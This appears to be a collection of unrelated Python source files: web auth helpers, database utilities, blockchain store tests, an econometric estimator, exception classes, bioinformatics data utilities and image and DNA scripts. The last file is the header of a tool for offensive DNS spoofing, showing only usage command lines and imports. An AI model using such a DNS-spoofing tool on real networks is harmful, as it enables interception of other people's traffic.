    """Never to be called directly, exposes request.user.

    Looks up the User record for the JWT-authenticated user id;
    presumably User.by_id returns None when there is no match — confirm
    against the model.
    """
    return User.by_id(request.authenticated_userid, db=request.db)
class RootFactory:
    """Give all Authenticated users the "authenticated" permission."""

    # Populated in __init__ when the JWT decodes to an existing user.
    user: t.Optional[User] = None

    def __init__(self, request: Request) -> None:
        if request.authenticated_userid:
            self.user = request.user

    @property
    def __acl__(self) -> t.List[t.Tuple]:
        """If JWT is correctly decoded and user exists, grant them permissions."""
        if not self.user:
            return []
        return [(Allow, str(self.user.id), "authenticated")]
|
from functools import wraps
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql import expression
from sqlalchemy.types import DateTime
from pygmy.config import config
def dbconnection(func):
    """Decorator that injects ``config.db.store`` as the DB session argument.

    With positional args, the store is inserted after the first argument
    (typically ``self``/``cls``); otherwise it becomes the first argument.
    On any SQLAlchemy error the session is rolled back and the exception
    re-raised.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        try:
            if args:
                return func(args[0], config.db.store, *args[1:], **kwargs)
            return func(config.db.store, **kwargs)
        except SQLAlchemyError:
            config.db.store.rollback()
            raise
    return wrapper
class utcnow(expression.FunctionElement):
    # SQL function element that renders a server-side "current timestamp"
    # expression, compiled per-dialect below.
    type = DateTime()
@compiles(utcnow)
def __utcnow_default(element, compiler, **kw):
    # Generic dialects: standard SQL current timestamp.
    return 'CURRENT_TIMESTAMP'
# @compiles(utcnow, 'mysql')
# def __utcnow_mysql(element, compiler, **kw):
#     return 'UTC_TIMESTAMP()'
@compiles(utcnow, 'postgresql')
def __utcnow_pg(element, compiler, **kw):
    # PostgreSQL: CLOCK_TIMESTAMP() gives the actual wall-clock time
    # rather than the transaction start time.
    return "CLOCK_TIMESTAMP()"
|
import asyncio
import random
import sqlite3
from pathlib import Path
import aiosqlite
import pytest
from achi.consensus.blockchain import Blockchain
from achi.full_node.block_store import BlockStore
from achi.full_node.coin_store import CoinStore
from achi.util.db_wrapper import DBWrapper
from tests.setup_nodes import bt, test_constants
@pytest.fixture(scope="module")
def event_loop():
    # Module-scoped loop so all async tests in this module share one event
    # loop instead of pytest-asyncio's default per-function loop.
    loop = asyncio.get_event_loop()
    yield loop
class TestBlockStore:
    """Integration tests for BlockStore against temporary SQLite files."""
    @pytest.mark.asyncio
    async def test_block_store(self):
        # Serialized threading mode is required for the aiosqlite setup used here.
        assert sqlite3.threadsafety == 1
        blocks = bt.get_consecutive_blocks(10)
        db_filename = Path("blockchain_test.db")
        db_filename_2 = Path("blockchain_test2.db")
        # Start from a clean slate in case a previous run left files behind.
        if db_filename.exists():
            db_filename.unlink()
        if db_filename_2.exists():
            db_filename_2.unlink()
        connection = await aiosqlite.connect(db_filename)
        connection_2 = await aiosqlite.connect(db_filename_2)
        db_wrapper = DBWrapper(connection)
        db_wrapper_2 = DBWrapper(connection_2)
        # Use a different file for the blockchain
        coin_store_2 = await CoinStore.create(db_wrapper_2)
        store_2 = await BlockStore.create(db_wrapper_2)
        bc = await Blockchain.create(coin_store_2, store_2, test_constants)
        store = await BlockStore.create(db_wrapper)
        # Creating the store twice on the same DB must be harmless.
        await BlockStore.create(db_wrapper_2)
        try:
            # Save/get block
            for block in blocks:
                await bc.receive_block(block)
                block_record = bc.block_record(block.header_hash)
                block_record_hh = block_record.header_hash
                # Duplicate adds/gets/set_peak check idempotence.
                await store.add_full_block(block.header_hash, block, block_record)
                await store.add_full_block(block.header_hash, block, block_record)
                assert block == await store.get_full_block(block.header_hash)
                assert block == await store.get_full_block(block.header_hash)
                assert block_record == (await store.get_block_record(block_record_hh))
                await store.set_peak(block_record.header_hash)
                await store.set_peak(block_record.header_hash)
            assert len(await store.get_full_blocks_at([1])) == 1
            assert len(await store.get_full_blocks_at([0])) == 1
            assert len(await store.get_full_blocks_at([100])) == 0
            # Get blocks
            block_record_records = await store.get_block_records()
            assert len(block_record_records[0]) == len(blocks)
            # Peak is correct
            assert block_record_records[1] == blocks[-1].header_hash
        except Exception:
            # Clean up DB files even when an assertion fails, then re-raise.
            await connection.close()
            await connection_2.close()
            db_filename.unlink()
            db_filename_2.unlink()
            raise
        await connection.close()
        await connection_2.close()
        db_filename.unlink()
        db_filename_2.unlink()
    @pytest.mark.asyncio
    async def test_deadlock(self):
        """
        This test was added because the store was deadlocking in certain situations, when fetching and
        adding blocks repeatedly. The issue was patched.
        """
        blocks = bt.get_consecutive_blocks(10)
        db_filename = Path("blockchain_test.db")
        db_filename_2 = Path("blockchain_test2.db")
        if db_filename.exists():
            db_filename.unlink()
        if db_filename_2.exists():
            db_filename_2.unlink()
        connection = await aiosqlite.connect(db_filename)
        connection_2 = await aiosqlite.connect(db_filename_2)
        wrapper = DBWrapper(connection)
        wrapper_2 = DBWrapper(connection_2)
        store = await BlockStore.create(wrapper)
        coin_store_2 = await CoinStore.create(wrapper_2)
        store_2 = await BlockStore.create(wrapper_2)
        bc = await Blockchain.create(coin_store_2, store_2, test_constants)
        block_records = []
        for block in blocks:
            await bc.receive_block(block)
            block_records.append(bc.block_record(block.header_hash))
        # Hammer the store with interleaved concurrent adds and reads of
        # random blocks; a deadlock would hang the gather below.
        tasks = []
        for i in range(10000):
            rand_i = random.randint(0, 9)
            if random.random() < 0.5:
                tasks.append(
                    asyncio.create_task(
                        store.add_full_block(blocks[rand_i].header_hash, blocks[rand_i], block_records[rand_i])
                    )
                )
            if random.random() < 0.5:
                tasks.append(asyncio.create_task(store.get_full_block(blocks[rand_i].header_hash)))
        await asyncio.gather(*tasks)
        await connection.close()
        await connection_2.close()
        db_filename.unlink()
        db_filename_2.unlink()
|
"""Estimates the semilinear Choo and Siow homoskedastic (2006) model
using Poisson GLM.
"""
from typing import Optional
from math import sqrt
import numpy as np
import scipy.linalg as spla
import scipy.sparse as spr
from sklearn import linear_model
from .matching_utils import Matching, _make_XY_K_mat, _variance_muhat
from .poisson_glm_utils import PoissonGLMResults, _prepare_data
def choo_siow_poisson_glm(
    muhat: Matching,
    phi_bases: np.ndarray,
    tol: Optional[float] = 1e-12,
    max_iter: Optional[int] = 10000,
    verbose: Optional[int] = 1,
) -> PoissonGLMResults:
    """Estimates the semilinear Choo and Siow homoskedastic (2006) model
    using Poisson GLM.
    Args:
        muhat: the observed Matching
        phi_bases: an (X, Y, K) array of bases
        tol: tolerance level for `linear_model.PoissonRegressor.fit`
        max_iter: maximum number of iterations
        for `linear_model.PoissonRegressor.fit`
        verbose: defines how much output we want (0 = least)
    Returns:
        a `PoissonGLMResults` instance
    Example:
        ```py
        n_households = 1e6
        X, Y, K = 4, 3, 6
        # we setup a quadratic set of basis functions
        phi_bases = np.zeros((X, Y, K))
        phi_bases[:, :, 0] = 1
        for x in range(X):
            phi_bases[x, :, 1] = x
            phi_bases[x, :, 3] = x * x
            for y in range(Y):
                phi_bases[x, y, 4] = x * y
        for y in range(Y):
            phi_bases[:, y, 2] = y
            phi_bases[:, y, 5] = y * y
        lambda_true = np.random.randn(K)
        phi_bases = np.random.randn(X, Y, K)
        Phi = phi_bases @ lambda_true
        # we simulate a Choo and Siow sample from a population
        #   with equal numbers of men and women of each type
        n = np.ones(X)
        m = np.ones(Y)
        choo_siow_instance = ChooSiowPrimitives(Phi, n, m)
        mus_sim = choo_siow_instance.simulate(n_households)
        muxy_sim, mux0_sim, mu0y_sim, n_sim, m_sim = mus_sim.unpack()
        results = choo_siow_poisson_glm(mus_sim, phi_bases)
        # compare true and estimated parameters
        results.print_results(
            lambda_true,
            u_true=-np.log(mux0_sim / n_sim),
            v_true=-np.log(mu0y_sim / m_sim)
        )
        ```
    """
    # Dead code path kept for reference; the sparse construction below is
    # never exercised.
    try_sparse = False
    X, Y, K = phi_bases.shape
    XY = X * Y
    # Rows: one per (x, y) cell plus one per single-x and single-y margin.
    n_rows = XY + X + Y
    # Columns: u_x and v_y fixed effects plus the K basis coefficients.
    n_cols = X + Y + K
    # the vector of weights for the Poisson regression
    w = np.concatenate((2 * np.ones(XY), np.ones(X + Y)))
    # reshape the bases
    phi_mat = _make_XY_K_mat(phi_bases)
    if try_sparse:
        # NOTE(review): this branch looks broken — `np.ones(XY, n_cols)`
        # passes n_cols as a dtype and would raise; it is unreachable
        # while try_sparse is hard-coded False. Confirm before enabling.
        w_mat = spr.csr_matrix(
            np.concatenate((2 * np.ones(XY, n_cols), np.ones(X + Y, n_cols)))
        )
        # construct the Z matrix
        ones_X = spr.csr_matrix(np.ones((X, 1)))
        ones_Y = spr.csr_matrix(np.ones((Y, 1)))
        zeros_XK = spr.csr_matrix(np.zeros((X, K)))
        zeros_YK = spr.csr_matrix(np.zeros((Y, K)))
        zeros_XY = spr.csr_matrix(np.zeros((X, Y)))
        zeros_YX = spr.csr_matrix(np.zeros((Y, X)))
        id_X = spr.csr_matrix(np.eye(X))
        id_Y = spr.csr_matrix(np.eye(Y))
        Z_unweighted = spr.vstack(
            [
                spr.hstack([-spr.kron(id_X, ones_Y), -spr.kron(ones_X, id_Y), phi_mat]),
                spr.hstack([-id_X, zeros_XY, zeros_XK]),
                spr.hstack([zeros_YX, -id_Y, zeros_YK]),
            ]
        )
        Z = Z_unweighted / w_mat
    else:
        # Dense construction of the design matrix: the top block covers
        # the XY matched cells, the two lower blocks the singles margins.
        ones_X = np.ones((X, 1))
        ones_Y = np.ones((Y, 1))
        zeros_XK = np.zeros((X, K))
        zeros_YK = np.zeros((Y, K))
        zeros_XY = np.zeros((X, Y))
        zeros_YX = np.zeros((Y, X))
        id_X = np.eye(X)
        id_Y = np.eye(Y)
        Z_unweighted = np.vstack(
            [
                np.hstack([-np.kron(id_X, ones_Y), -np.kron(ones_X, id_Y), phi_mat]),
                np.hstack([-id_X, zeros_XY, zeros_XK]),
                np.hstack([zeros_YX, -id_Y, zeros_YK]),
            ]
        )
        Z = Z_unweighted / w.reshape((-1, 1))
    _, _, _, n, m = muhat.unpack()
    var_muhat, var_munm = _variance_muhat(muhat)
    (
        muxyhat_norm,
        var_muhat_norm,
        var_munm_norm,
        n_households,
        n_individuals,
    ) = _prepare_data(muhat, var_muhat, var_munm)
    # alpha=0 disables regularization: this is a plain Poisson MLE.
    clf = linear_model.PoissonRegressor(
        fit_intercept=False, tol=tol, verbose=verbose, alpha=0, max_iter=max_iter
    )
    clf.fit(Z, muxyhat_norm, sample_weight=w)
    gamma_est = clf.coef_
    # we compute the variance-covariance of the estimator
    # (sandwich estimator: A^{-1} B A^{-1}).
    nr, nc = Z.shape
    exp_Zg = np.exp(Z @ gamma_est).reshape(n_rows)
    A_hat = np.zeros((nc, nc))
    B_hat = np.zeros((nc, nc))
    for i in range(nr):
        Zi = Z[i, :]
        wi = w[i]
        A_hat += wi * exp_Zg[i] * np.outer(Zi, Zi)
        for j in range(nr):
            Zj = Z[j, :]
            B_hat += wi * w[j] * var_muhat_norm[i, j] * np.outer(Zi, Zj)
    A_inv = spla.inv(A_hat)
    variance_gamma = A_inv @ B_hat @ A_inv
    stderrs_gamma = np.sqrt(np.diag(variance_gamma))
    beta_est = gamma_est[-K:]
    beta_std = stderrs_gamma[-K:]
    Phi_est = phi_bases @ beta_est
    # we correct for the effect of the normalization
    n_norm = n / n_individuals
    m_norm = m / n_individuals
    u_est = gamma_est[:X] + np.log(n_norm)
    v_est = gamma_est[X:-K] + np.log(m_norm)
    # since u = a + log(n_norm) we also need to adjust the estimated variance
    z_unweighted_T = Z_unweighted.T
    u_std = np.zeros(X)
    ix = XY
    for x in range(X):
        n_norm_x = n_norm[x]
        A_inv_x = A_inv[x, :]
        # Delta-method pieces: Var(log n_x) plus the covariance of the
        # fixed effect with log n_x.
        var_log_nx = var_munm_norm[ix, ix] / n_norm_x / n_norm_x
        slice_x = slice(x * Y, (x + 1) * Y)
        covar_term = var_muhat_norm[:, ix] + np.sum(var_muhat_norm[:, slice_x], 1)
        cov_a_lognx = (A_inv_x @ z_unweighted_T @ covar_term) / n_norm_x
        ux_var = variance_gamma[x, x] + var_log_nx + 2.0 * cov_a_lognx
        u_std[x] = sqrt(ux_var)
        ix += 1
    v_std = stderrs_gamma[X:-K]
    iy, jy = X, XY + X
    for y in range(Y):
        m_norm_y = m_norm[y]
        A_inv_y = A_inv[iy, :]
        var_log_my = var_munm_norm[jy, jy] / m_norm_y / m_norm_y
        # Cells for a fixed y are spaced Y apart in the flattened XY grid.
        slice_y = slice(y, XY, Y)
        covar_term = var_muhat_norm[:, jy] + np.sum(var_muhat_norm[:, slice_y], 1)
        cov_b_logmy = (A_inv_y @ z_unweighted_T @ covar_term) / m_norm_y
        vy_var = variance_gamma[iy, iy] + var_log_my + 2.0 * cov_b_logmy
        v_std[y] = sqrt(vy_var)
        iy += 1
        jy += 1
    results = PoissonGLMResults(
        X=X,
        Y=Y,
        K=K,
        number_households=n_households,
        number_individuals=n_individuals,
        estimated_gamma=gamma_est,
        estimated_Phi=Phi_est,
        estimated_beta=beta_est,
        estimated_u=u_est,
        estimated_v=v_est,
        variance_gamma=variance_gamma,
        stderrs_gamma=stderrs_gamma,
        stderrs_beta=beta_std,
        stderrs_u=u_std,
        stderrs_v=v_std,
    )
    return results
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Ironic base exception handling.
Includes decorator for re-raising Ironic-type exceptions.
SHOULD include dedicated exception logging.
"""
import logging
import six
from oslo_config import cfg
from ironic_lib.openstack.common._i18n import _
from ironic_lib.openstack.common._i18n import _LE
LOG = logging.getLogger(__name__)
# Config option controlling whether message-formatting errors inside
# IronicException.__init__ are fatal (re-raised) or merely logged.
exc_log_opts = [
    cfg.BoolOpt('fatal_exception_format_errors',
                default=False,
                help='Make exception message format errors fatal.'),
]
CONF = cfg.CONF
CONF.register_opts(exc_log_opts)
class IronicException(Exception):
    """Base Ironic Exception

    To correctly use this class, inherit from it and define
    a 'message' property. That message will get printf'd
    with the keyword arguments provided to the constructor.
    """
    message = _("An unknown exception occurred.")
    code = 500
    headers = {}
    safe = False

    def __init__(self, message=None, **kwargs):
        self.kwargs = kwargs
        if 'code' not in self.kwargs:
            try:
                self.kwargs['code'] = self.code
            except AttributeError:
                pass
        if not message:
            try:
                message = self.message % kwargs
            except Exception as e:
                # kwargs doesn't match a variable in the message
                # log the issue and the kwargs
                LOG.exception(_LE('Exception in string format operation'))
                # BUG FIX: dict.iteritems() does not exist on Python 3;
                # items() works on both Python 2 and 3 (this file otherwise
                # supports both via six).
                for name, value in kwargs.items():
                    LOG.error("%s: %s" % (name, value))
                if CONF.fatal_exception_format_errors:
                    raise e
                else:
                    # at least get the core message out if something happened
                    message = self.message
        super(IronicException, self).__init__(message)

    def format_message(self):
        # Exceptions that crossed an RPC boundary get a '_Remote' class-name
        # suffix; their original formatted message is in args[0].
        if self.__class__.__name__.endswith('_Remote'):
            return self.args[0]
        else:
            return six.text_type(self)
class InstanceDeployFailure(IronicException):
    # Requires a 'reason' keyword argument for message formatting.
    message = _("Failed to deploy instance: %(reason)s")
class FileSystemNotSupported(IronicException):
    # Requires an 'fs' keyword argument for message formatting.
    message = _("Failed to create a file system. "
                "File system %(fs)s is not supported.")
|
import csv
import hashlib
import io
import os
import random
import re
import time
from functools import partial
from multiprocessing import current_process
from typing import Dict
from urllib.parse import urlparse
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
import requests
from retrying import retry
from data_refinery_common.performant_pagination.pagination import PerformantPaginator
# Found: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
METADATA_URL = "http://169.254.169.254/latest/meta-data"
# Lazily-initialized module-level caches, populated on first use by the
# corresponding getter functions below.
INSTANCE_ID = None
SUPPORTED_MICROARRAY_PLATFORMS = None
SUPPORTED_RNASEQ_PLATFORMS = None
READABLE_PLATFORM_NAMES = None
ANNOTATION_PACKAGE_OVERRIDES = None
def get_env_variable(var_name: str, default: str = None) -> str:
    """Get an environment variable or return the provided default.

    Raises:
        ImproperlyConfigured: if the variable is unset and no default
            was given.
    """
    try:
        return os.environ[var_name]
    except KeyError:
        # BUG FIX: the original used `if default:`, so a legitimate
        # empty-string default was treated as "no default" and raised.
        if default is not None:
            return default
        error_msg = "Set the %s environment variable" % var_name
        raise ImproperlyConfigured(error_msg)
def get_env_variable_gracefully(var_name: str, default: str = None) -> str:
    """
    Get an environment variable, or return a default value, but always fail
    gracefully and return something rather than raising an
    ImproperlyConfigured error.
    """
    return os.environ.get(var_name, default)
def get_instance_id() -> str:
    """Returns the AWS instance id where this is running or "local".

    The result is cached in the module-level INSTANCE_ID for the life of
    the process.
    """
    global INSTANCE_ID
    if INSTANCE_ID is None:
        if settings.RUNNING_IN_CLOUD:
            # Query the EC2 instance-metadata endpoint; retry up to 3 times
            # since the metadata service can be briefly unavailable.
            @retry(stop_max_attempt_number=3)
            def retrieve_instance_id():
                return requests.get(os.path.join(METADATA_URL, "instance-id")).text
            INSTANCE_ID = retrieve_instance_id()
        else:
            INSTANCE_ID = "local"
    return INSTANCE_ID
def get_worker_id() -> str:
    """Returns <instance_id>/<process_name> identifying this worker."""
    return "{}/{}".format(get_instance_id(), current_process().name)
def get_supported_microarray_platforms(
    platforms_csv: str = "config/supported_microarray_platforms.csv",
) -> list:
    """
    Loads our supported microarray platforms file and returns a list of
    dictionaries containing the internal accession, the external accession,
    and a boolean indicating whether or not the platform supports brainarray.

    CSV must be in the format:
    Internal Accession | External Accession | Supports Brainarray

    The result is cached in the module-level SUPPORTED_MICROARRAY_PLATFORMS.
    """
    global SUPPORTED_MICROARRAY_PLATFORMS
    if SUPPORTED_MICROARRAY_PLATFORMS is not None:
        return SUPPORTED_MICROARRAY_PLATFORMS

    SUPPORTED_MICROARRAY_PLATFORMS = []
    with open(platforms_csv) as platforms_file:
        reader = csv.reader(platforms_file)
        for line in reader:
            # Skip the header row. Lines are 1 indexed, #BecauseCSV
            if reader.line_num == 1:
                continue

            platform_accession = line[0]
            external_accession = line[1]
            is_brainarray = line[2] == "y"

            # One helper instead of three copy-pasted append blocks.
            def _add(accession):
                SUPPORTED_MICROARRAY_PLATFORMS.append(
                    {
                        "platform_accession": platform_accession,
                        "external_accession": accession,
                        "is_brainarray": is_brainarray,
                    }
                )

            _add(external_accession)

            # A-GEOD-13158 is the same platform as GPL13158 and this pattern
            # is generalizable. Since we don't want to have to list a lot of
            # platforms twice just with different prefixes, we convert them
            # and add them to the list. Our list of supported platforms
            # contains both A-GEOD-* and GPL*, so convert both ways.
            if external_accession.startswith("A-GEOD"):
                _add(external_accession.replace("A-GEOD-", "GPL"))
            if external_accession.startswith("GPL"):
                _add(external_accession.replace("GPL", "A-GEOD-"))

    return SUPPORTED_MICROARRAY_PLATFORMS
def get_supported_rnaseq_platforms(
    platforms_list: str = "config/supported_rnaseq_platforms.txt",
) -> list:
    """
    Returns the list of currently supported RNASeq platforms, one per line of
    the config file. Cached in the module-level SUPPORTED_RNASEQ_PLATFORMS.
    """
    global SUPPORTED_RNASEQ_PLATFORMS
    if SUPPORTED_RNASEQ_PLATFORMS is None:
        with open(platforms_list) as platforms_file:
            SUPPORTED_RNASEQ_PLATFORMS = [line.strip() for line in platforms_file]
    return SUPPORTED_RNASEQ_PLATFORMS
def get_readable_affymetrix_names(
    mapping_csv: str = "config/readable_affymetrix_names.csv",
) -> Dict:
    """
    Loads the mapping from human readable names to internal accessions for
    Affymetrix platforms.

    CSV must be in the format:
    Readable Name | Internal Accession

    Returns a dictionary mapping internal accessions to human readable names,
    cached in the module-level READABLE_PLATFORM_NAMES.
    """
    global READABLE_PLATFORM_NAMES
    if READABLE_PLATFORM_NAMES is not None:
        return READABLE_PLATFORM_NAMES

    with open(mapping_csv, encoding="utf-8") as mapping_file:
        reader = csv.reader(mapping_file)
        next(reader, None)  # skip the header row
        READABLE_PLATFORM_NAMES = {row[1]: row[0] for row in reader}
    return READABLE_PLATFORM_NAMES
def get_affymetrix_annotation_package_name_overrides(
    overrides_csv: str = "config/affymetrix_annotation_package_name_overrides.csv",
) -> Dict:
    """
    Loads the mapping from annotation package name to internal accession for
    Affymetrix platforms.

    CSV must be in the format:
    Annotation Package Name | Internal Accession

    Returns a dictionary mapping internal accessions to annotation package
    names, cached in the module-level ANNOTATION_PACKAGE_OVERRIDES.
    """
    global ANNOTATION_PACKAGE_OVERRIDES
    if ANNOTATION_PACKAGE_OVERRIDES is not None:
        return ANNOTATION_PACKAGE_OVERRIDES

    with open(overrides_csv, encoding="utf-8") as overrides_file:
        reader = csv.reader(overrides_file)
        next(reader, None)  # skip the header row
        ANNOTATION_PACKAGE_OVERRIDES = {row[1]: row[0] for row in reader}
    return ANNOTATION_PACKAGE_OVERRIDES
def get_internal_microarray_accession(accession_code):
    """Map an external or internal accession code to its internal accession.

    Returns None when the code matches no supported platform.
    """
    for platform in get_supported_microarray_platforms():
        if accession_code in (platform["external_accession"], platform["platform_accession"]):
            return platform["platform_accession"]
    return None
def get_normalized_platform(external_accession):
    """
    Handles a weirdo case where external accessions carry a trailing
    "stv<digit>" version suffix, e.g. hugene10stv1 -> hugene10st.
    """
    # The pattern is anchored at the end, so findall yields at most one match.
    suffixes = re.findall(r"stv\d$", external_accession)
    if suffixes:
        external_accession = external_accession.replace(suffixes[0], "st")
    return external_accession
def parse_s3_url(url):
    """
    Parse an S3 URL into (bucket, path).

    The bucket is the URL's network location and the path is the URL path
    with surrounding slashes stripped. Falsy input yields ("", "").
    """
    if not url:
        return "", ""
    parsed = urlparse(url)
    return parsed.netloc, parsed.path.strip("/")
def get_s3_url(s3_bucket: str, s3_key: str) -> str:
    """
    Builds the public S3 URL for a file from the bucket name and the file key.
    """
    return "{}.s3.amazonaws.com/{}".format(s3_bucket, s3_key)
def calculate_file_size(absolute_file_path):
    """Return the size, in bytes, of the file at the given path."""
    return os.stat(absolute_file_path).st_size
def calculate_sha1(absolute_file_path):
    """Compute the SHA-1 hex digest of a file, reading it in buffered chunks."""
    digest = hashlib.sha1()
    with open(absolute_file_path, mode="rb") as open_file:
        while True:
            chunk = open_file.read(io.DEFAULT_BUFFER_SIZE)
            if not chunk:
                break
            digest.update(chunk)
    return digest.hexdigest()
def calculate_md5(absolute_file_path):
    """Compute the MD5 hex digest of a file, reading it in buffered chunks."""
    digest = hashlib.md5()
    with open(absolute_file_path, mode="rb") as open_file:
        while True:
            chunk = open_file.read(io.DEFAULT_BUFFER_SIZE)
            if not chunk:
                break
            digest.update(chunk)
    return digest.hexdigest()
def calculate_sha1_and_md5(absolute_file_path):
    """Compute both SHA-1 and MD5 hex digests in a single pass over the file."""
    sha1_digest = hashlib.sha1()
    md5_digest = hashlib.md5()
    with open(absolute_file_path, mode="rb") as open_file:
        while True:
            chunk = open_file.read(io.DEFAULT_BUFFER_SIZE)
            if not chunk:
                break
            sha1_digest.update(chunk)
            md5_digest.update(chunk)
    return sha1_digest.hexdigest(), md5_digest.hexdigest()
def get_sra_download_url(run_accession, protocol="fasp"):
    """Try getting the sra-download URL from CGI endpoint.

    Returns the URL string on success, or None when the request fails,
    returns a non-200 status, or the response cannot be parsed.
    """
    # Ex: curl --data "acc=SRR6718414&accept-proto=fasp&version=2.0" \
    # https://www.ncbi.nlm.nih.gov/Traces/names/names.cgi
    cgi_url = "https://www.ncbi.nlm.nih.gov/Traces/names/names.cgi"
    data = "acc=" + run_accession + "&accept-proto=" + protocol + "&version=2.0"
    try:
        resp = requests.post(cgi_url, data=data)
    except Exception:
        # Our configured logger needs util, so we use the standard logging library for just this.
        import logging

        logger = logging.getLogger(__name__)
        logger.exception("Bad CGI request!: " + str(cgi_url) + ", " + str(data))
        return None

    if resp.status_code != 200:
        # This isn't on the new servers
        return None
    else:
        try:
            # From: '#2.0\nsrapub|DRR002116|2324796808|2013-07-03T05:51:55Z|50964cfc69091cdbf92ea58aaaf0ac1c||fasp://dbtest@sra-download.ncbi.nlm.nih.gov:data/sracloud/traces/dra0/DRR/000002/DRR002116|200|ok\n'
            # To: 'dbtest@sra-download.ncbi.nlm.nih.gov:data/sracloud/traces/dra0/DRR/000002/DRR002116'
            # Sometimes, the responses from names.cgi makes no sense at all on a per-accession-code basis. This helps us handle that.
            # $ curl --data "acc=SRR5818019&accept-proto=fasp&version=2.0" https://www.ncbi.nlm.nih.gov/Traces/names/names.cgi
            # 2.0\nremote|SRR5818019|434259775|2017-07-11T21:32:08Z|a4bfc16dbab1d4f729c4552e3c9519d1|||400|Only 'https' protocol is allowed for this object
            # The URL lives in pipe-delimited field 6 of the second line.
            sra_url = resp.text.split("\n")[1].split("|")[6]
            return sra_url
        except Exception:
            # Our configured logger needs util
            # so we use the standard logging library for just this.
            import logging

            logger = logging.getLogger(__name__)
            exception_template = "Error parsing CGI response: {0} {1} {2}"
            logger.exception(exception_template.format(str(cgi_url), str(data), str(resp.text)))
            return None
def get_fasp_sra_download(run_accession: str):
    """Get an URL for SRA using the FASP protocol.

    The returned URL has the "fasp://" scheme stripped off; None when the
    lookup fails.
    """
    full_url = get_sra_download_url(run_accession, "fasp")
    if not full_url:
        return None
    return full_url.split("fasp://")[1]
def get_https_sra_download(run_accession: str):
    """Get an HTTPS URL for SRA, or None when the CGI lookup fails."""
    return get_sra_download_url(run_accession, protocol="https")
def load_blacklist(blacklist_csv: str = "config/RNASeqRunBlackList.csv"):
    """Load the SRA run blacklist.

    Returns the stripped first column of every row after the header.
    """
    with open(blacklist_csv, encoding="utf-8") as blacklist_file:
        reader = csv.reader(blacklist_file)
        next(reader, None)  # skip the header row
        return [row[0].strip() for row in reader]
def queryset_page_iterator(queryset, page_size=2000):
    """Yield each page's object_list from a queryset via the performant paginator."""
    paginator = PerformantPaginator(queryset, page_size)
    page = paginator.page()
    yield page.object_list
    while page.has_next():
        page = paginator.page(page.next_page_number())
        yield page.object_list
def queryset_iterator(queryset, page_size=2000):
    """Yield every item of a queryset, paging through it with the performant paginator."""
    for page in queryset_page_iterator(queryset, page_size):
        yield from page
def download_file(
    download_url,
    target_file_path,
    retry=1,
    *,
    backoff_factor=8,
    max_retries=10,
    max_sleep_timeout=120  # 2 mins
):
    """
    Downloads the given url into `target_file_path`.

    The download will be retried `max_retries` times if it fails for any reason.
    We use the exponential backoff https://en.wikipedia.org/wiki/Exponential_backoff
    algorithm to add some randomness between retries.
    """
    try:
        # thanks to https://stackoverflow.com/a/39217788/763705
        with requests.get(download_url, stream=True) as r:
            with open(target_file_path, "wb") as f:
                for chunk in r.iter_content(chunk_size=(4 * 1024 * 1024)):
                    if chunk:  # filter out keep-alive new chunks
                        f.write(chunk)
    except Exception:
        if retry >= max_retries:
            # Re-raise the original exception with its traceback intact.
            raise
        # After the retry-th failed attempt, retry downloading after
        # k*backoff_factor, where k is a random integer between 0 and 2^retry - 1.
        k = random.randint(0, 2 ** retry - 1)
        time.sleep(min(k * backoff_factor, max_sleep_timeout))
        # BUG FIX: the original recursive call dropped the keyword arguments,
        # silently resetting caller-supplied backoff_factor / max_retries /
        # max_sleep_timeout to their defaults on every retry.
        download_file(
            download_url,
            target_file_path,
            retry + 1,
            backoff_factor=backoff_factor,
            max_retries=max_retries,
            max_sleep_timeout=max_sleep_timeout,
        )
class FileUtils:
    """Static helpers for inspecting file paths."""

    @staticmethod
    def is_archive(file_path):
        """True when the path's extension marks a supported archive type."""
        extension = FileUtils.get_extension(file_path)
        return bool(extension) and extension in (".tar", ".tgz", ".gz", ".zip")

    @staticmethod
    def get_filename(file_path):
        """Return the final component of the path."""
        return os.path.basename(file_path)

    @staticmethod
    def get_extension(file_path):
        """Return the lower-cased extension (including the dot), or None for empty input."""
        if not file_path:
            return None
        _, extension = os.path.splitext(file_path)
        return extension.lower()
|
import cv2
import numpy as np

# Load the image as grayscale (flag 0), so img.shape is (rows, cols).
img = cv2.imread("ferrari.jpg", 0)
row, col = img.shape
# Affine translation matrix: shift 53 px right and 35 px down.
M = np.float32([[1, 0, 53], [0, 1, 35]])
# BUG FIX: warpAffine's dsize argument is (width, height), i.e. (col, row).
# The original passed (row, col), which transposed the output size for any
# non-square image.
dst = cv2.warpAffine(img, M, (col, row))
cv2.imshow("dst", dst)
cv2.waitKey(0)
cv2.destroyAllWindows()
import networkx as nx
from Bio import SeqIO

# Build the overlap graph O3 (Rosalind GRPH): draw an edge s -> t whenever
# the last three bases of sequence s equal the first three bases of t.
G = nx.DiGraph()
seq_DNA = {}
for record in SeqIO.parse("rosalind_grph.txt", "fasta"):
    G.add_node(record.id)
    seq_DNA[record.id] = str(record.seq)

for src_id, src_seq in seq_DNA.items():
    for dst_id, dst_seq in seq_DNA.items():
        if src_id != dst_id and src_seq[-3:] == dst_seq[:3]:
            G.add_edge(src_id, dst_id)

nx.write_edgelist(G, "edge_list.txt", data=False)
#!/usr/bin/python2.6
'''
### SEYED YAHYA NIKOUEI
dns2proxy for offensive cybersecurity v1.0
python dns2proxy.py -h for Usage.
Example:
python2.6 dns2proxy.py -i eth0 -u 192.168.1.101 -d 192.168.1.200
Example for no forwarding (only configured domain based queries and spoofed hosts):
python2.6 dns2proxy.py -i eth0 -noforward
Example for no forwarding but add IPs
python dns2proxy.py -i eth0 -I 192.168.1.101,90.1.1.1,155.54.1.1 -noforward
Author: Leonardo Nve ( leonardo.nve@gmail.com)
'''
import dns.message
import dns.rrset
import dns.resolver
import socket
import numbers
import threading
from struct import *
import datetime
import pcapy
import os
import signal
import errno
from time import sleep
